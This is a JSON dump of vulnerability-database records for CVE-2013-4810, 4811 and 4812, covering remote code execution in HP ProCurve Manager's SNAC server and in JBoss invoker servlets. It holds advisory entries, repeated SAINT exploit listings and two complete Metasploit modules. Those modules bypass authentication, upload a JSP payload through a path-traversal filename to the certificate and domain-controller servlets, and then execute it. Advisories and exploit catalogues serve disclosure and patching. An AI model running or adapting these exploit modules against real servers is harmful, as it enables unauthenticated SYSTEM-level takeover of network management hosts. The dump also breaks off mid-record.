"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4811"], "modified": "2013-09-11T00:00:00", "id": "ZDI-13-226", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:01:23", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus and Application Lifecycle Management. Authentication is not required to exploit this vulnerability. The specific flaw exists within the exposed EJBInvokerServlet and JMXInvokerServlet. An unauthenticated attacker can post a marshalled object allowing them to install an arbitrary application on the target server. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user in HP PCM Plus and with administrative privileges on Application Lifecycle Management.", "cvss3": {}, "published": "2013-09-11T00:00:00", "type": "zdi", "title": "HP PCM+ and Application Lifecycle Management JBoss Invoker Servlets Marshalled Object Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-09-11T00:00:00", "id": "ZDI-13-229", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-229/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2022-01-26T11:36:35", "description": "Added: 10/03/2013 \nCVE: [CVE-2013-4812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812>) \nBID: [62348](<http://www.securityfocus.com/bid/62348>) \nOSVDB: [97155](<http://www.osvdb.org/97155>) \n\n\n### Background\n\nHP ProCurve Manager (PCM) is a secure, advanced Windows-based network management platform that allows administrators to configure, update, monitor, and troubleshoot ProCurve devices centrally. \n\n### Problem\n\nThe SNAC registration server in HP ProCurve Manager (PCM) is vulnerable to remote code execution. The issue is due to the `**UpdateCertificatesServlet**` servlet not properly sanitizing the fileName argument. By uploading a crafted JSP file, a remote attacker could execute code under the context of the SYSTEM user. \n\n### Resolution\n\nUpdate as directed in [HP Security Bulletin HPSBPV02918](<https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-225/> \n\n\n### Limitations\n\nExploit works on HP ProCurve Manager 4.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-03T00:00:00", "type": "saint", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet FileName Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-10-03T00:00:00", "id": "SAINT:7F3C5163C30890F5F0C5C51957FFFEEF", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/hp_pcm_snac_updatecertificateservlet_filename", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:56", "description": "Added: 10/03/2013 \nCVE: [CVE-2013-4812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812>) \nBID: [62348](<http://www.securityfocus.com/bid/62348>) \nOSVDB: [97155](<http://www.osvdb.org/97155>) \n\n\n### Background\n\nHP ProCurve Manager (PCM) is a secure, advanced Windows-based network management platform that allows administrators to configure, update, monitor, and troubleshoot ProCurve devices centrally. \n\n### Problem\n\nThe SNAC registration server in HP ProCurve Manager (PCM) is vulnerable to remote code execution. The issue is due to the `**UpdateCertificatesServlet**` servlet not properly sanitizing the fileName argument. By uploading a crafted JSP file, a remote attacker could execute code under the context of the SYSTEM user. \n\n### Resolution\n\nUpdate as directed in [HP Security Bulletin HPSBPV02918](<https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-225/> \n\n\n### Limitations\n\nExploit works on HP ProCurve Manager 4.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-03T00:00:00", "type": "saint", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet FileName Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4812"], "modified": "2013-10-03T00:00:00", "id": "SAINT:D7E7AE713FCC306B414BDDDCF928FB38", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_pcm_snac_updatecertificateservlet_filename", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:38", "description": "Added: 10/03/2013 \nCVE: [CVE-2013-4812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812>) \nBID: [62348](<http://www.securityfocus.com/bid/62348>) \nOSVDB: [97155](<http://www.osvdb.org/97155>) \n\n\n### Background\n\nHP ProCurve Manager (PCM) is a secure, advanced Windows-based network management platform that allows administrators to configure, update, monitor, and troubleshoot ProCurve devices centrally. \n\n### Problem\n\nThe SNAC registration server in HP ProCurve Manager (PCM) is vulnerable to remote code execution. The issue is due to the `**UpdateCertificatesServlet**` servlet not properly sanitizing the fileName argument. By uploading a crafted JSP file, a remote attacker could execute code under the context of the SYSTEM user. \n\n### Resolution\n\nUpdate as directed in [HP Security Bulletin HPSBPV02918](<https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-225/> \n\n\n### Limitations\n\nExploit works on HP ProCurve Manager 4.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-03T00:00:00", "type": "saint", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet FileName Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-10-03T00:00:00", "id": "SAINT:66194A0423C6048B45F3300165835412", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_pcm_snac_updatecertificateservlet_filename", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:15", "description": "Added: 10/03/2013 \nCVE: [CVE-2013-4812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812>) \nBID: [62348](<http://www.securityfocus.com/bid/62348>) \nOSVDB: [97155](<http://www.osvdb.org/97155>) \n\n\n### Background\n\nHP ProCurve Manager (PCM) is a secure, advanced Windows-based network management platform that allows administrators to configure, update, monitor, and troubleshoot ProCurve devices centrally. \n\n### Problem\n\nThe SNAC registration server in HP ProCurve Manager (PCM) is vulnerable to remote code execution. The issue is due to the `**UpdateCertificatesServlet**` servlet not properly sanitizing the fileName argument. By uploading a crafted JSP file, a remote attacker could execute code under the context of the SYSTEM user. \n\n### Resolution\n\nUpdate as directed in [HP Security Bulletin HPSBPV02918](<https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-225/> \n\n\n### Limitations\n\nExploit works on HP ProCurve Manager 4.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-03T00:00:00", "type": "saint", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet FileName Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-10-03T00:00:00", "id": "SAINT:279F95372544AFCA3000201D14830112", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_pcm_snac_updatecertificateservlet_filename", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:17", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet which can be exploited to deploy and execute arbitray Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:88A58EBA93902ACCCFD4D15339D739F8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:22", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet which can be exploited to deploy and execute arbitray Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:F331FA17751309C5BD461AF4E8A90312", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:36:34", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet which can be exploited to deploy and execute arbitray Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:C4CE6EE786263B63DE8534C3A7C9A1ED", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:59", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet which can be exploited to deploy and execute arbitray Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:73B78E4CC6A84900DDFE755805A5092F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-14T10:21:16", "description": "This Metasploit module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary files, just having into account binary writes aren't allowed. Additionally, authentication can be bypassed in order to upload the file. This Metasploit module has been tested successfully on the SNAC server installed with HP ProCurve Manager 4.0.", "cvss3": {}, "published": "2013-09-17T00:00:00", "type": "zdt", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4812"], "modified": "2013-09-17T00:00:00", "id": "1337DAY-ID-21240", "href": "https://0day.today/exploit/description/21240", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload',\r\n 'Description' => %q{\r\n This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\r\n vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary\r\n files, just having into account binary writes aren't allowed. Additionally, authentication\r\n can be bypassed in order to upload the file. This module has been tested successfully on\r\n the SNAC server installed with HP ProCurve Manager 4.0.\r\n },\r\n 'Author' =>\r\n [\r\n 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-4812' ],\r\n [ 'OSVDB', '97155' ],\r\n [ 'BID', '62348' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-225/' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'HP ProCurve Manager 4.0 SNAC Server', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true,\r\n },\r\n 'DisclosureDate' => 'Sep 09 2013'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443)\r\n ], self.class )\r\n end\r\n\r\n def check\r\n session = get_session\r\n if session.nil?\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"/RegWeb/RegWeb/GetCertificateStatusServlet\",\r\n 'cookie' => session\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /\"success\":\"true\"/\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_session\r\n res = send_request_cgi({ 'uri' => \"/RegWeb/html/snac/index.html\" })\r\n session = nil\r\n if res and res.code == 200\r\n session = res.get_cookies\r\n end\r\n\r\n if session and not session.empty?\r\n return session\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def exploit_upload(session)\r\n jsp_name = \"#{rand_text_alphanumeric(8+rand(8))}.jsp\"\r\n rand_password = rand_text_alpha(4 + rand(10))\r\n post_message = Rex::MIME::Message.new\r\n post_message.add_part(payload.encoded, \"application/x-pkcs12\", nil, \"form-data; name=\\\"importFile\\\"; filename=\\\"\\\\../#{jsp_name}\\\"\")\r\n post_message.add_part(rand_password, nil, nil, \"form-data; name=\\\"importPasswd\\\"\")\r\n post_message.add_part(\"{\\\"importPasswd\\\":\\\"#{rand_password}\\\"}\", nil, nil, \"form-data; name=\\\"cert_data\\\"\")\r\n post_message.add_part(\"importCertificate\", nil, nil, \"form-data; name=\\\"cert_action\\\"\")\r\n data = post_message.to_s\r\n data.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\")\r\n\r\n res = send_request_cgi(\r\n {\r\n 'uri' => \"/RegWeb/RegWeb/UpdateCertificatesServlet\",\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_message.bound}\",\r\n 'cookie' => session,\r\n 'data' => data,\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /Certificate import fails/\r\n return jsp_name\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def peer\r\n return \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Getting a valid session...\")\r\n session = get_session\r\n if session.nil?\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to get a valid session\")\r\n end\r\n\r\n print_status(\"#{peer} - Uploading payload...\")\r\n jsp = exploit_upload(session)\r\n unless jsp\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload failed\")\r\n end\r\n\r\n print_status(\"#{peer} - Executing payload...\")\r\n send_request_cgi({ 'uri' => \"/RegWeb/#{jsp}\" })\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/21240", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-09T19:43:51", "description": "This Metasploit module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The vulnerability in the UpdateDomainControllerServlet allows an attacker to upload arbitrary files, just having into account binary writes aren't allowed. Additionally, authentication can be bypassed in order to upload the file. This Metasploit module has been tested successfully on the SNAC server installed with HP ProCurve Manager 4.0.", "cvss3": {}, "published": "2013-09-17T00:00:00", "type": "zdt", "title": "HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4811"], "modified": "2013-09-17T00:00:00", "id": "1337DAY-ID-21241", "href": "https://0day.today/exploit/description/21241", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload',\r\n 'Description' => %q{\r\n This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\r\n vulnerability in the UpdateDomainControllerServlet allows an attacker to upload arbitrary\r\n files, just having into account binary writes aren't allowed. Additionally, authentication\r\n can be bypassed in order to upload the file. This module has been tested successfully on\r\n the SNAC server installed with HP ProCurve Manager 4.0.\r\n },\r\n 'Author' =>\r\n [\r\n 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-4811' ],\r\n [ 'OSVDB', '97154' ],\r\n [ 'BID', '62349' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-226/' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'HP ProCurve Manager 4.0 SNAC Server', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true,\r\n },\r\n 'DisclosureDate' => 'Sep 09 2013'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443)\r\n ], self.class )\r\n end\r\n\r\n def check\r\n session = get_session\r\n if session.nil?\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"/RegWeb/RegWeb/GetDomainControllerServlet\",\r\n 'cookie' => session\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /domainName/\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_session\r\n res = send_request_cgi({ 'uri' => \"/RegWeb/html/snac/index.html\" })\r\n session = nil\r\n if res and res.code == 200\r\n session = res.get_cookies\r\n end\r\n\r\n if session and not session.empty?\r\n return session\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def exploit_upload(session)\r\n jsp_name = \"#{rand_text_alphanumeric(8+rand(8))}.jsp\"\r\n post_message = Rex::MIME::Message.new\r\n post_message.add_part(payload.encoded, \"application/octet-stream\", nil, \"form-data; name=\\\"adCert\\\"; filename=\\\"\\\\../#{jsp_name}\\\"\")\r\n post_message.add_part(\"{}\", nil, nil, \"form-data; name=\\\"ad_data\\\"\")\r\n post_message.add_part(\"add\", nil, nil, \"form-data; name=\\\"ad_action\\\"\")\r\n data = post_message.to_s\r\n data.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\")\r\n\r\n res = send_request_cgi(\r\n {\r\n 'uri' => \"/RegWeb/RegWeb/UpdateDomainControllerServlet\",\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_message.bound}\",\r\n 'cookie' => session,\r\n 'data' => data,\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /success:false/\r\n return jsp_name\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def peer\r\n return \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Getting a valid session...\")\r\n session = get_session\r\n if session.nil?\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to get a valid session\")\r\n end\r\n\r\n print_status(\"#{peer} - Uploading payload...\")\r\n jsp = exploit_upload(session)\r\n unless jsp\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload failed\")\r\n end\r\n\r\n print_status(\"#{peer} - Executing payload...\")\r\n send_request_cgi({ 'uri' => \"/RegWeb/#{jsp}\" })\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/21241", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in HP PCM+ SNAC Registration Server UpdateCertificatesServlet\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2013-10-10T00:00:00", "type": "dsquare", "title": "HP PCM+ SNAC Registration Server UpdateCertificatesServlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-10-10T00:00:00", "id": "E-349", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in HP PCM+ SNAC Registration Server UpdateDomainControllerServlet\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2013-10-10T00:00:00", "type": "dsquare", "title": "HP PCM+ SNAC Registration Server UpdateDomainControllerServlet File Upload", "bulletinFamily": "exploit", 